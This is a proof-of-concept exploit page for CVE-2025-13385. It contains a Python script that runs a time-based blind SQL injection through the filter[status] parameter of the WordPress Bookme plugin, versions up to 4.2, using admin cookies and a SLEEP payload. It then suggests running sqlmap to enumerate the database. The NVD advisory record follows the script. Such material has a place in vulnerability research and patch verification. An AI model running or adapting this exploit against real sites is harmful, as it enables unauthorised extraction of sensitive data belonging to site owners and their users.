CVE-2025-13385

# CVE-2025-13385 SQL Injection PoC # Target: WordPress with Bookme plugin <= 4.2 # Attack Type: Time-based SQL Injection via filter[status] parameter import requests import time import sys target_url = input("Enter target URL (e.g., http://example.com): ").rstrip('/') # Authenticated admin session cookie cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add your authenticated admin cookies here } def sql_injection_test(payload): """Test SQL injection with time-based blind technique""" params = { 'page': 'bookme-calendar', 'filter[status]': payload } start_time = time.time() try: response = requests.get( f"{target_url}/wp-admin/admin.php", params=params, cookies=cookies, timeout=30 ) elapsed = time.time() - start_time return elapsed >= 5 # If response took >= 5 seconds, injection works except: return False # Example: Test if current user is admin (always true for this PoC) test_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- " print(f"[*] Testing SQL injection with payload: {test_payload}") if sql_injection_test(test_payload): print("[+] SQL Injection confirmed!") print("[*] Use sqlmap for further exploitation:") print(f"sqlmap -u '{target_url}/wp-admin/admin.php?page=bookme-calendar&filter[status]=1' --cookie='...' --dbs") else: print("[-] Injection failed or authentication required")

{"cve": {"id": "CVE-2025-13385", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:50.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bookme – Free Online Appointment Booking and Scheduling Plugin for WordPress is vulnerable to time-based SQL Injection via the `filter[status]` parameter in all versions up to, and including, 4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/tags/4.2/app/admin/Bookings.php#L123", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/trunk/app/admin/Bookings.php#L123", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c17222-5de5-4ecd-a7c6-beabe7624c5b?source=cve", "source": "[email protected]"}]}}